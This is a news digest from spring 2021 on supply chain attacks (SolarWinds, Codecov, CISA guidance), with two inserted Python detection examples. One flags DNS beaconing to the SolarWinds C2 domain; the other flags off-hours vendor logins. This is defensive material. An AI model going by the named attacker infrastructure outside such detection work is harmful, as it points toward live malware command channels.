Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks.


 _______________________________________________________________________________________

(May 26, 2021)


How SolarWinds changed cybersecurity leadership's priorities

The recent Scale survey showed that in wake of SolarWinds attacks, security leaders are retooling their security operations in response to the changing threat environment. For instance, 36% said that they expected third-party risks to rise over the next 12 months. Around 47% said third-party risks are a top factor affecting the C-suite's understanding of the business impact of security, behind data breaches at 57% and remote work at 54%.


_______________________________________________________________________________________

(May 26, 2021)


Federal Agencies struggling with supply chain security

More than five months after the SolarWinds supply chain attack came to light, federal agencies continue to struggle with supply chain security, according to a Government Accountability Office official. In the absence of foundational risk management practices, malicious actors may continue to exploit vulnerabilities in the ICT supply chain, causing further disruption to mission operations, harm to individuals, or theft of intellectual property.


_______________________________________________________________________________________

(May 25, 2021)


Supply chain attacks: How to reduce open-source vulnerabilities

Organizations are increasingly turning to adversary simulation engagements to reduce the impact of supply chain attacks. In these tests, a ‘red’ team uses the same tactics, techniques, and procedures that threat actors employ. The ‘blue’ team responds to the attacks from the red team. They’ll gain valuable knowledge by combating the same tools threat actors are currently using.


_______________________________________________________________________________________

(May 25, 2021)


How to avoid web supply chain attacks

The simplest thing you can ask of your suppliers for secure interaction is that your contractors present you with a web vulnerability scanner compliance report, such as the OWASP Top 10 report offered by Acunetix. This type of report shows which of the vulnerabilities a scanner can detect are present in the software you are purchasing and whether they are the kind you should worry about; it does not cover what a scanner cannot see.


_______________________________________________________________________________________

(May 25, 2021)


Three-quarters of CISOs predict another SolarWinds-style attack

Some 84% of global organizations have suffered a serious security incident over the past two years and a majority are expecting another SolarWinds-style supply chain attack, according to a new Splunk report.


_______________________________________________________________________________________

(May 25, 2021)


Tailor security training to developers to tackle software supply chain risks

A lack of cohesion between software development teams and cybersecurity functions compounds the software supply chain risks faced by organizations, making it all the more urgent for cybersecurity leaders and their teams to better engage with and educate developers. The training must be tailored to address the specific cyber risks surrounding the software development lifecycle.

Ref - CSO Online 

_______________________________________________________________________________________

(May 24, 2021)


Recent cyberattacks signal alarm for better supply chain security

There are three important lessons from the fallout of recent major cyber incidents, including SolarWinds attacks. Any organization leveraging third-party software must not take its convenience and claims of being secure at face value but pay attention to the integrity of the services they use. There must be a focus on container security. Before integrating a third-party service, organizations need to ensure that these vendors’ security standards are up-to-par.

 
_______________________________________________________________________________________

(May 24, 2021)


SolarWinds, Exchange attacks revive calls for mandatory breach notification

On the heels of three major cybersecurity incidents over the past six months—the SolarWinds and Microsoft Exchange supply chain attacks and the Colonial Pipeline ransomware attack—government officials and some in the private sector are reviving calls for better information sharing and national breach notification requirements.

Ref - CSO Online 

_______________________________________________________________________________________

(May 21, 2021)


E-commerce giant Mercari suffers major data breach in Codecov incident

E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. The company has confirmed that tens of thousands of customer records, including financial information, were exposed to external actors due to the Codecov breach.


_______________________________________________________________________________________

(May 21, 2021)


Department of Veterans Affairs not a victim of SolarWinds hack

The Department of Veterans Affairs (VA) was not a victim of the sweeping SolarWinds hacking campaign, the department’s top cyber official told lawmakers. Paul Cunningham, chief information security officer of VA, said there was no evidence of compromise across its wide-ranging and complex networks. He told lawmakers this finding was reaffirmed in separate investigations by the CISA and the intelligence community.

Ref - Fed Scoop
 
_______________________________________________________________________________________

(May 20, 2021)


12 lessons learned from the SolarWinds breach

CRN spoke with 12 prominent C-suite executives at RSA Conference 2021 about the biggest lessons learned from one of the most infamous cyberattacks of all time. They compiled 12 major takeaways from the SolarWinds breach, from applying far greater scrutiny to technology suppliers and to code used during application development, to eliminating the use of on-premises Microsoft Active Directory.

Ref - CRN 

_______________________________________________________________________________________

(May 20, 2021)


SolarWinds attack dates back to at least January 2019

Hackers were present in SolarWinds' systems as early as January 2019, months earlier than previously reported, SolarWinds President and CEO Sudhakar Ramakrishna revealed during an appearance at the 2021 RSA Conference (RSAC). The entry point was the SolarWinds Orion software. Attackers compromised the SolarWinds system for distributing software updates and used that to spread malware to its customers.

Ref - PCMag 

_______________________________________________________________________________________

(May 19, 2021)


SentinelOne: More supply chain attacks are coming

Large-scale supply chain attacks are here to stay, according to Marco Figueroa, the principal threat researcher at SentinelOne. During an RSA Conference 2021 session, Figueroa dissected Sunburst, the malware used to compromise SolarWinds' Orion platform that led to an extensive supply chain attack on dozens of organizations.

Ref - TechTarget 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO provides new details into attack and response

New details into the notorious SolarWinds nation-state attack and its fallout were provided by Sudhakar Ramakrishna, CEO of SolarWinds, during a keynote session on Day 3 of the virtual RSA Conference 2021. This included the revelation that the attackers may have accessed the system as early as January 2019 and an expression of remorse for comments made during his congressional appearance about the attack in February 2021.


_______________________________________________________________________________________

(May 19, 2021)


monday.com source code has been accessed by Codecov threat actors

monday.com has revealed that it was affected by the Codecov supply-chain attack, which recently hit several organizations. During the attack, threat actors accessed a read-only copy of its source code. The attack began around January 31, 2021, when the attackers gained access to hundreds of networks belonging to Codecov's users.


_______________________________________________________________________________________

(May 19, 2021)


How CISA limited the impact of the SolarWinds attack

Soon after the specifics about the SolarWinds attack came to light, the DHS went to work to limit the damage. Among the first things it did was put the attack signatures into the EINSTEIN toolset that is used by nearly every agency. EINSTEIN was extremely useful in terms of identifying suspicious network traffic from a handful of federal civilian agencies that upon further investigation by those agencies helped identify additional victims of this campaign.


_______________________________________________________________________________________

(May 19, 2021)


Pentagon’s CMMC compliance may block a SolarWinds-style attack

The Pentagon’s Cybersecurity Maturity Model Certification (CMMC) program is designed to be one key line of defense. The program sets out five maturity models applicable to defense industrial base contractors based on the level of sensitivity of information stored in their systems. Under the program, obtaining a certification of compliance at the appropriate risk level is an allowable cost. However, the extent to which contractors may have to dig into their own pockets to obtain certification is a running concern.

Ref - FCW 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO apologizes for blaming an intern

Sudhakar Ramakrishna, the former CEO of Pulse Secure who took the top job at SolarWinds, apologized for the way the company blamed an intern for using a weak password - solarwinds123 - during early testimony before Congress. When asked about the password, former SolarWinds CEO Kevin Thompson said the password was a mistake that an intern made. Ramakrishna also told lawmakers that the password was from an intern’s GitHub account.

Ref - The Record 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds - a harbinger for a national data breach reporting law

As the SolarWinds attack showed, the conversation around federal data breach reporting legislation is becoming increasingly relevant. FireEye’s public disclosure of the SolarWinds attack exemplified the benefits of proactive partnerships between the government and private sector, which have been strengthened over the years by routine information sharing and other initiatives.

Ref - Duo 

_______________________________________________________________________________________


(May 18, 2021)


Government eyes new rules to tighten security against supply chain attacks

The Department for Digital, Culture, Media, and Sport (DCMS) has put out a call for views on the new rules, which may require IT service providers and managed services providers (MSPs) to undergo the same cybersecurity assessments that critical national infrastructure providers do.

Ref - ZDNet 

_______________________________________________________________________________________

(May 18, 2021)


Russian denial regarding SolarWinds hack is 'unconvincing'

Russia's denial of involvement in the SolarWinds hack is "unconvincing", the former head of GCHQ's National Cyber Security Centre has said. Prof. Ciaran Martin also said there was evidence that the tactics, techniques, and tools used by the hackers matched many years of SVR activity.

Ref - BBC 

_______________________________________________________________________________________

(May 18, 2021)


Russian spy chief denies SolarWinds attack

Russia's spy chief denied responsibility for the SolarWinds cyber attack but said he was "flattered" by the accusations from the U.S. and Britain that Russian foreign intelligence was behind such a sophisticated hack. Naryshkin said he did not want to accuse the U.S. of being behind the attack but quoted from documents leaked by former NSA contractor Edward Snowden to suggest that the tactics of the attack were similar to those used by U.S. and British intelligence agencies.

Ref - Reuters 

_______________________________________________________________________________________

(May 17, 2021)


Disconnect Internet for 3-5 days to evict SolarWinds hackers from the network

The newly published analysis report, AR21-134A, details resource-intensive and highly complex steps that will require disconnecting the enterprise network from the internet for three to five days. It is tailored for federal agencies that used affected versions of SolarWinds Orion and which discovered adversary activity within their environments (Category 3 agencies).


_______________________________________________________________________________________

(May 16, 2021)


SolarWinds breach exposes hybrid multi-cloud security weaknesses

Exposing severe security weaknesses in hybrid cloud, authentication, and least-privilege access configurations, the high-profile SolarWinds breach laid bare just how vulnerable every business is. Enterprise leaders must see beyond the much-hyped baseline levels of identity and access management (IAM) and privileged access management (PAM) now offered by cloud providers.

Ref - VentureBeat 

_______________________________________________________________________________________

(May 14, 2021)


Supplemental direction (v4) on the implementation of CISA Emergency Directive (ED) 21-01

Agencies that have or had networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address, including networks hosted by third parties on behalf of federal agencies, must comply with the applicable requirements for each network meeting respective conditions.

Ref - DHS
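The follow-on activity condition above hinges on one observable: DNS resolution of avsvmcloud[.]com or its subdomains from inside the network. As an added example (not from the DHS direction, CISA, or Cyware), the following Python flags such queries in a constructed DNS query log. The log line format, the hostnames, and the subdomain label are assumptions made for the sample; the apex domain is the one named in the directive.

```python
import re
from dataclasses import dataclass

# Constructed sample DNS query log (assumed key=value format; not real telemetry).
# The long subdomain label is made up to resemble a generated beacon name.
SAMPLE_DNS_LOG = """\
2021-05-14T10:02:11Z host=ws-0137 qtype=A qname=www.example.com
2021-05-14T10:02:19Z host=srv-orion01 qtype=A qname=02a2b1c3d4e5f6a7b8c9.appsync-api.eu-west-1.avsvmcloud.com
2021-05-14T10:03:40Z host=ws-0042 qtype=AAAA qname=login.microsoftonline.com
2021-05-14T10:05:02Z host=srv-orion01 qtype=A qname=avsvmcloud.com.lookalike.test
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) qtype=(?P<qtype>\S+) qname=(?P<qname>\S+)$"
)


@dataclass(frozen=True)
class DnsHit:
    ts: str
    host: str
    qname: str


def is_under_domain(qname: str, apex: str) -> bool:
    """True if qname is the apex or a subdomain of it.

    A label-boundary check is used instead of a substring search so that a
    name such as avsvmcloud.com.lookalike.test does not produce a false hit.
    """
    q = qname.rstrip(".").lower()
    apex = apex.rstrip(".").lower()
    return q == apex or q.endswith("." + apex)


def find_beacon_queries(log_text: str, apex: str = "avsvmcloud.com") -> list:
    """Return every parsed log line whose query name falls under `apex`."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        if is_under_domain(m["qname"], apex):
            hits.append(DnsHit(m["ts"], m["host"], m["qname"]))
    return hits


def hosts_to_triage(hits: list) -> list:
    """Distinct source hosts that resolved a name under the watched apex."""
    return sorted({h.host for h in hits})


if __name__ == "__main__":
    found = find_beacon_queries(SAMPLE_DNS_LOG)
    for h in found:
        print(f"{h.ts} {h.host} -> {h.qname}")
    print("hosts to triage:", hosts_to_triage(found))
```

The suffix check matters in practice: a query name that merely contains the string avsvmcloud.com is not under that zone, and the last sample line is there to show that the function ignores it.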

_______________________________________________________________________________________

(May 14, 2021)


Guidance for networks affected by the SolarWinds and Active Directory/M365 Compromise

Remediation plans for dealing with malicious compromises are necessarily unique to every organization, and success requires careful consideration. There are three phases for evicting the actor: Pre-Eviction (actions to detect and identify APT activity and prepare the network for eviction); Eviction (actions to remove the APT actor from on-premises and cloud environments); and Post-Eviction (actions to ensure eviction was successful and the network has good cyber posture).

Ref - CISA 

_______________________________________________________________________________________

(May 14, 2021)


Effective tactics to prevent supply chain attacks

Upguard recommends several strategies that give the highest chance of preventing supply chain attacks. These include implementing honeytokens, deploying secure Privileged Access Management, and implementing a Zero Trust Architecture. In addition, it recommends identifying all potential insider threats, protecting vulnerable resources, and minimizing access to sensitive data.

Ref - Upguard 

_______________________________________________________________________________________

(May 14, 2021)


Rapid7 source code, alert data accessed in Codecov supply chain attack

Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. The cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.

Ref - ZDNet
 
_______________________________________________________________________________________

(May 13, 2021)


Addressing SolarWinds through executive action

The Executive Order (EO) on cybersecurity is a much-needed step toward shoring up the nation’s cyber posture. On the heels of last week’s damaging ransomware attack on Colonial Pipeline, this EO is a necessary step forward. While the EO will not solve all of the security problems or prevent the next SolarWinds attack – and the truth is no single policy, government initiative, or technology will – it is a great start. 

Ref - Forbes 

_______________________________________________________________________________________

(May 13, 2021)


Third-party software may leave you vulnerable to cyberattacks

Leaders need new ways to reduce supply chain cybersecurity risks, whether they’re buying digital products or producing them. The data showed that managers often fall prey to counterproductive and possibly dangerous mindsets that get in the way of securing supply chains and leave their companies exposed, and that they’re often taking cues from the top.

Ref - HBR 

_______________________________________________________________________________________

(May 13, 2021)


Some implicitly trusted infrastructure areas can lead to supply chain compromises

Supply chains are vast, and this is by no means a comprehensive list of potential problems. A threat modeling exercise within the organization can give a more robust view of vulnerable infrastructure that is often overlooked. Users should take a concentrated look at the implicit trust relationships that they have with vendors and open-source software used in their build or manufacturing process and they will likely find many areas where trust supersedes security.


_______________________________________________________________________________________

(May 12, 2021)


How Biden’s new executive order plans to prevent another SolarWinds attack

The Biden administration has been drafting the order over the last few months. It is designed less to address an incident like the one experienced by Colonial Pipeline, a privately owned critical infrastructure operator that is believed to have been hit by a criminal gang, than to prevent a future SolarWinds-like incident.

 
_______________________________________________________________________________________

(May 12, 2021)


Senate hearing raises questions about SolarWinds backdoors

The U.S. Department of Commerce's CISO said during a Senate committee hearing Tuesday that his agency was one of the first to identify a SolarWinds-related compromise, raising questions about when the U.S. government initially detected the supply chain attacks.

 
_______________________________________________________________________________________

(May 12, 2021)


Supply chain penetration: Here’s how to protect against it

Effective protection of the supply chain means the adoption of a different mindset, one that assumes a breach will happen at some point. Because the supply chain represents a critical attack vector, an attack in this area could be a critical one, so cyber measures must be stepped up accordingly. Securing access to sensitive data and systems means organizations can reduce the risks significantly, thereby making it more difficult for attackers to achieve their end goals.


_______________________________________________________________________________________

(May 11, 2021)


Senators discuss federal cybersecurity following SolarWinds hack

Government officials say the 2020 SolarWinds cyber hack by the Russian government should have been a wake-up call. The U.S. is instead dealing with another cyber attack, this time on the largest fuel pipeline in the country. The SolarWinds and Pulse Secure VPN attacks targeted federal agencies and yet it was private sector companies that discovered them.

Ref - News10 

_______________________________________________________________________________________

(May 11, 2021)


Key challenges with modern AppSec and supply chain attacks

The OWASP API project has enumerated 10 critical API level threats that are substantially more important in the era of modern, cloud-native applications. The three key trends – microservice proliferation, application change, and porous perimeters – create an environment where attacks can flourish and where IT and security teams need to consider revisiting their application security practices and controls.

Ref - DevOps 

_______________________________________________________________________________________

(May 11, 2021)


SolarWinds CEO calls for collective action against state attacks

SolarWinds CEO Sudhakar Ramakrishna has revealed he is talking with his peers in the industry to form a consortium of like-minded, mid-market firms that could take collective action to defend themselves against nation state-backed malicious actors, such as Russia’s APT29, or Cozy Bear. Ramakrishna called for the industry to adopt a model of mutual responsibility and mutual accountability among smaller firms, noting that size alone is not an indicator of a company’s ability to protect itself from cyber attacks.


_______________________________________________________________________________________

(May 10, 2021)


Twilio, HashiCorp among Codecov supply chain hack victims

The stealth software supply chain compromise of the Codecov Bash Uploader went undetected since January. The first company to publicly acknowledge exposure was HashiCorp when a post-breach investigation found a subset of its CI pipelines used the affected Codecov component. Following HashiCorp’s statement, San Francisco-based Twilio issued an advisory to confirm it used the compromised Bash Uploader component in a small number of projects and CI pipelines.


_______________________________________________________________________________________

(May 10, 2021)


All you need to know about supply chain attacks and cloud-native

There are several characteristics of cloud-native application development environments that make them a lucrative target for attackers looking to embed malicious code into the supply chain. Cloud-native application development is characterized by the widespread use of open source components, often obtained from public registries. Additionally, container images, functions, and packages are updated frequently using CI/CD pipelines, creating multiple opportunities for attackers to embed themselves into the process.

Ref - TheNewStack 

_______________________________________________________________________________________

(May 10, 2021)


Cisco Threat Explainer: Supply Chain Attacks

There is a general pattern in supply chain attacks. First, the bad actors gather what information they can find about the primary target. Next, the bad actors attempt to compromise the secondary target. Once in, the attackers move laterally, their objective often being to compromise the secondary target’s software build system, where the source code for their software is stored, updated, and compiled.

Ref - Cisco 

_______________________________________________________________________________________

(May 10, 2021)


NIST and CISA release guidelines for defense against software supply chain attacks

CISA and NIST have released new guidelines on defending against various software supply chain risks. The agencies listed update hijacking, tampering with code signing, and the compromise of open-source code as popular methods used by hackers to compromise software. Threat actors hijack update channels, as in the Russian NotPetya attack on Ukraine via tax accounting software. The SolarWinds Orion software supply chain attack employed similar tactics.

Ref - CPO Magazine 

_______________________________________________________________________________________

(May 10, 2021)


Ransomware attack on CaptureRx exposes multiple providers across the U.S.

Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services. The CaptureRx attack highlights the impact of the software supply chain, and Faxton St. Luke’s Healthcare in New York, Randolph, VT-based Gifford Health Care, and Thrifty Drug Stores are just a few of the victims.

Ref - ZDNet 

_______________________________________________________________________________________

(May 10, 2021)


The Colonial Pipeline ransomware attack and the SolarWinds hack were all but inevitable

Software supply chains and private sector infrastructure companies are vulnerable to hackers. Many U.S. companies outsource software development because of a talent shortage, and some of that outsourcing goes to companies in Eastern Europe that are vulnerable to Russian operatives.

Ref - Yahoo 

_______________________________________________________________________________________

(May 10, 2021)


SolarWinds shares more information on cyberattack impact, initial access vector

Texas-based IT management company SolarWinds shared more information on the impact of the significant breach disclosed late last year, and claimed that less than 100 of its customers were actually hacked. The company said the attacker only targeted its build system for the Orion product, but did not actually modify any source code repository, and the SUNBURST malware has not been found in any other product.


_______________________________________________________________________________________

(May 8, 2021)


Best practices to reduce supply chain cyber exposure

Cyber-attacks against the supply chain continue to grow — and some are simply impossible to eliminate. With that in mind, consider an approach rooted in cyber risk management. Whereas a traditional cybersecurity approach focuses primarily on mitigation, cyber risk management understands that not all risks can be removed and not all attacks can be prevented, especially when it comes to the supply chain.

Ref - Marsh
 
_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian Group likely took data during the cyberattack

While SolarWinds doesn’t know how the Russia-backed group broke into its networks, the company believes the hackers may have used an unknown vulnerability, a brute-force attack, or social engineering such as a phishing operation. The hackers then conducted “research and surveillance” on the company, including its Microsoft Office 365 environment, for at least nine months prior to October 2019, when they moved to the “test run” phase of the attack.

Ref - Bloomberg 

_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian group likely took data during cyber-attack

The Russia-linked hackers that compromised popular software by the Texas-based firm SolarWinds last year broke into email accounts and likely took data from the firm. SolarWinds said it found “evidence that causes us to believe the threat actor exfiltrated certain information as part of its research and surveillance.”


_______________________________________________________________________________________

(May 7, 2021)


Hackers accessed SolarWinds’ Office 365 since early 2019

Hackers persistently accessed SolarWinds’ internal systems, Microsoft Office 365 environment, and software development environment for months before carrying out their vicious cyberattack. Hackers compromised SolarWinds’ credentials and conducted research and surveillance via persistent access for at least nine months prior to their October 2019 trial run.

Ref - CRN 

_______________________________________________________________________________________

(May 7, 2021)


US-UK Government warns about SolarWinds attackers adding a new tool to their arsenal

Agencies in the U.S. and the U.K. published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some of their operations were exposed.

Ref - SecurityWeek 

_______________________________________________________________________________________

(May 7, 2021)


An investigative update of the cyberattack

SolarWinds has revealed that it has found evidence that the threat actor exfiltrated certain information as part of its research and surveillance. The threat actor created and moved files that contained source code for both Orion Platform software and non-Orion products. The threat actor created and moved additional files, including a file that may have contained data supporting SolarWinds’ customer portal application. The threat actor accessed email accounts of certain personnel, and also moved files to a jump server, which was possibly intended to facilitate exfiltration of the files out of the environment.

Ref - SolarWinds 

_______________________________________________________________________________________

(May 7, 2021)


FBI, NSA, CISA & NCSC Issue Joint Advisory on Russian SVR Activity

Government agencies from the United States and the United Kingdom have teamed up to issue a new joint advisory detailing TTPs of Russia's Foreign Intelligence Service (SVR) after the group was publicly attributed to the SolarWinds supply chain attack. Agencies provided more details on SVR activity, including the exploitation that followed the SolarWinds Orion software compromise.


_______________________________________________________________________________________

(May 7, 2021)


Ransomware, supply chain attacks show no sign of abating

Ransomware and supply chain attacks are two of the most common attack vectors that offer high returns for threat actors. In the aftermath of the SolarWinds attack that had affected prominent companies like Microsoft, the panelists noted that more supply chain attacks have been enabled by the growing dependencies between systems that have become more interconnected than ever.


_______________________________________________________________________________________

(May 7, 2021)


Further TTPs associated with SVR cyber actors

Organizations are advised to follow the mitigation advice and guidance in the advisory, as well as the detection rules in its appendix, to help protect against this activity. Organizations should also follow the advice and guidance in the recently published NSA advisory and the FBI and CISA alert, which detail further TTPs linked to SVR cyber actors.


_______________________________________________________________________________________

(May 6, 2021)


Following SolarWinds hack, US spy agencies review software suppliers' ties to Russia

U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors. The review will focus on any supply chain vulnerabilities stemming from Russian companies, or the U.S. companies that do business in Russia.

Ref - CyberScoop 

_______________________________________________________________________________________

(May 5, 2021)


Twilio discloses breach caused by Codecov supply chain hack

Twilio posted a blog disclosing that a small number of customer emails had likely been exfiltrated by an unknown attacker who cloned Twilio's code repositories on GitHub in mid-April. The company further connected the activity to the Codecov breach disclosed last month.

Ref - TechTarget 

_______________________________________________________________________________________

(May 3, 2021)


New Hampshire pushes pause on creating supply chain authority

To reduce cybersecurity risks, a New Hampshire lawmaker has proposed legislation to create an Information Technology Supply Chain Risk Authority to oversee all purchases and acquisitions of software, hardware, and telecommunication services used within state agencies.

Ref - GovTech

_______________________________________________________________________________________

(May 3, 2021)


Stopping the next SolarWinds requires doing something different

The SolarWinds breach is not the first major supply chain breach, but previous similar breaches failed to prompt effective regulatory action. The SolarWinds breach came in via a trusted vendor, which means even the most diligent cyber hygiene and immediate patching would not have helped. Likewise, information sharing is important, but it took nine months to detect the SolarWinds attack — so by the time there was information to share, it was too late.

Ref - DarkReading 

_______________________________________________________________________________________

(May 3, 2021)


Key indicators that the supply chain vendor has been breached

If a vendor does not provide clear and substantial responses to risk assessments, they could be concealing gaping holes in their information security program. If a vendor's website or mobile app is behaving suspiciously, a cyberattack could be taking place. If system tracking can monitor network activity between internal resources and vendors, establish a baseline for normal interaction and keep an eye out for login attempts outside of normal hours.

Ref - Upguard 
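The last indicator above, a baseline of normal vendor interaction with off-hours logins flagged, is straightforward to automate. As an added example (not Upguard's or Cyware's code), the following Python builds a per-vendor baseline of login hours and source addresses from a constructed log and reports later logins that fall outside it. The log format, the vendor and account names, the addresses, and the cutoff date are all assumptions made for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample of logins by vendor integration accounts (assumed
# key=value format; names and addresses are made up, not real data).
SAMPLE_LOGINS = """\
2021-04-19T09:12:03Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-19T14:40:51Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-20T09:05:17Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-20T16:22:09Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-21T10:11:45Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-21T15:58:30Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-26T10:03:12Z vendor=billing-saas user=svc-billing src=203.0.113.10 result=success
2021-04-27T03:17:44Z vendor=billing-saas user=svc-billing src=198.51.100.77 result=success
2021-04-27T03:18:02Z vendor=billing-saas user=svc-billing src=198.51.100.77 result=failure
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+) vendor=(?P<vendor>\S+) user=(?P<user>\S+) "
    r"src=(?P<src>\S+) result=(?P<result>\S+)$"
)

# Assumed split: everything before this instant is "known-good" history.
CUTOFF = datetime(2021, 4, 25, tzinfo=timezone.utc)


def parse_logins(text: str) -> list:
    """Parse the sample format into dicts with a timezone-aware timestamp."""
    events = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not match the assumed format
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({"ts": ts, "vendor": m["vendor"], "user": m["user"],
                       "src": m["src"], "result": m["result"]})
    return events


def build_baseline(events: list, cutoff: datetime) -> dict:
    """Per-vendor sets of UTC hours and source addresses seen before `cutoff`."""
    hours = defaultdict(set)
    sources = defaultdict(set)
    for e in events:
        if e["ts"] < cutoff:
            hours[e["vendor"]].add(e["ts"].hour)
            sources[e["vendor"]].add(e["src"])
    return {"hours": dict(hours), "sources": dict(sources)}


def flag_anomalies(events: list, baseline: dict, cutoff: datetime) -> list:
    """Logins at or after `cutoff` whose hour or source is absent from the baseline.

    Each finding is (timestamp, vendor, user, src, reasons); a vendor with no
    history at all is flagged on every login, which is the conservative choice.
    """
    findings = []
    for e in events:
        if e["ts"] < cutoff:
            continue
        reasons = []
        if e["ts"].hour not in baseline["hours"].get(e["vendor"], set()):
            reasons.append("off-hours")
        if e["src"] not in baseline["sources"].get(e["vendor"], set()):
            reasons.append("new-source")
        if reasons:
            findings.append((e["ts"].isoformat(), e["vendor"], e["user"], e["src"], reasons))
    return findings


def run_sample() -> list:
    events = parse_logins(SAMPLE_LOGINS)
    return flag_anomalies(events, build_baseline(events, CUTOFF), CUTOFF)


if __name__ == "__main__":
    for finding in run_sample():
        print(*finding)
```

On the sample, the login during the usual window from the usual address passes, while the two 03:00 UTC logins from an address never seen before are reported with both reasons. A real deployment would keep the baseline per account as well as per vendor and widen the history window well beyond three days.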

_______________________________________________________________________________________

(May 1, 2021)


More US agencies potentially hacked, this time with Pulse Secure exploits

At least five US federal agencies may have experienced cyberattacks that targeted recently discovered security flaws that give hackers free rein over vulnerable networks, the US CISA said. The zero-day vulnerability, tracked as CVE-2021-22893, was under active exploitation.

Ref - Ars Technica 

______________________________________________________________________________________

(April 30, 2021)


Key questions to consider to help mitigate against supply chain attacks

With the recent SolarWinds SUNBURST exploit, many security professionals are reassessing standard threat models and national cyber-defense strategies. How can organizations and system owners increase trust while still maintaining their own IT systems now? Enterprises can begin by rethinking their definition of access control, developing a patch management strategy that promotes research and testing, and monitoring their network for malicious behavior in collaboration with cyber threat intelligence.


_______________________________________________________________________________________

(April 30, 2021)


A tale of two hacks: from SolarWinds to Microsoft Exchange

The past four months have exposed two high-profile attacks, which both had pundits declaring them the “worst-ever” and “unprecedented.” They shared other similarities – both attacked businesses rather than individuals and affected tens of thousands of organizations. Both hacks involved nation-states. And in either case, no affected organization could be fully certain of finding and evicting any adversary.

Ref - ThreatPost 

_______________________________________________________________________________________

(April 29, 2021)


Finding the weakest link in the supply chain

An organization's cybersecurity defenses are only as strong as its weakest link. Successful supply chain attacks are considered especially dangerous because of their high potential for widespread contagion. With just one successful breach of a single vendor component, hackers could gain access to all of the organizations that make use of that vendor's supply chain.

Ref - Forbes 

_______________________________________________________________________________________

(April 29, 2021)


A new PHP composer bug could enable widespread supply-chain attacks

The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later.


_______________________________________________________________________________________

(April 29, 2021)


Biden preparing cybersecurity executive order in response to SolarWinds attack

President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December. The order, as it is written now, includes a spate of requirements that companies who conduct business with the government will be instructed to follow.

Ref - The Hill 

_______________________________________________________________________________________

(April 28, 2021)


Minimizing the risk of supply chain attacks – best practice guidelines

Sophos provides several recommendations to minimize the risk of supply chain attacks: switch from a reactive to a proactive approach to cybersecurity, monitor for early signs of compromise, audit the supply chain, assess the security posture of all suppliers and business partners, and constantly review IT security operations hygiene.

Ref - Sophos 

_______________________________________________________________________________________

(April 28, 2021)


Lawmakers want to create a reserve corps to respond to the next SolarWinds

A bipartisan group of lawmakers wants to create a National Guard-like program to address growing cybersecurity vulnerabilities faced by the U.S. government. Legislation introduced today would pilot two separate reserves of trained cybersecurity professionals for the Department of Homeland Security and the Defense Department.


_______________________________________________________________________________________

(April 28, 2021)


CISA issues guidance on defending against software supply chain attacks

The CISA has issued guidance following the compromise of the SolarWinds software that affected thousands of entities across the US and beyond. The guidance took the form of a primer for companies, explaining the nature of the software supply chain and the various access points where supply chain vulnerabilities exist. It concludes with concrete recommendations for both vendors and their customers with a discussion on the Secure Software Development Framework (SSDF) and Cyber Supply Chain Risk Management (C-SCRM).


_______________________________________________________________________________________

(April 28, 2021)


5 ways to protect software supply-chains from malicious attackers

Users can protect their organization against supply-chain attackers by avoiding the use of third-party modules; checking for threats when using modules created by unknown authors; performing automated scans of code submitted in repositories; having a plan made for external services; and creating an on-premises and cloud strategy.

Ref - Radware

_______________________________________________________________________________________

(April 27, 2021)


Another SolarWinds lesson: hackers are targeting Microsoft authentication servers

During SolarWinds, hackers directly targeted the AD FS servers to obtain certificates. Mandiant’s new attack does not require direct access to the AD FS server. Rather, hackers would spoof one AD FS server communicating with another to obtain its keys. This is not trivial, as it still requires credentials from an extremely privileged account to pull off. But given the capacity of the hackers involved in SolarWinds, chief information security officers should begin to see these kinds of attacks as part of the threat landscape.

Ref - SC Magazine 

_______________________________________________________________________________________

(April 27, 2021)


Software supply chain attacks may get you by exploiting open-source libraries

Nearly all software programs developed today contain open-source components. Unfortunately, open-source packages have the same challenges as any other software (i.e. they contain security bugs). Worse, once included in an application they can become rapidly out of date, lacking the most recent bug fixes. On top of that, open-source code is freely available to everyone, so bad actors can study and experiment with it without fear of exposing their next wave of attacks.


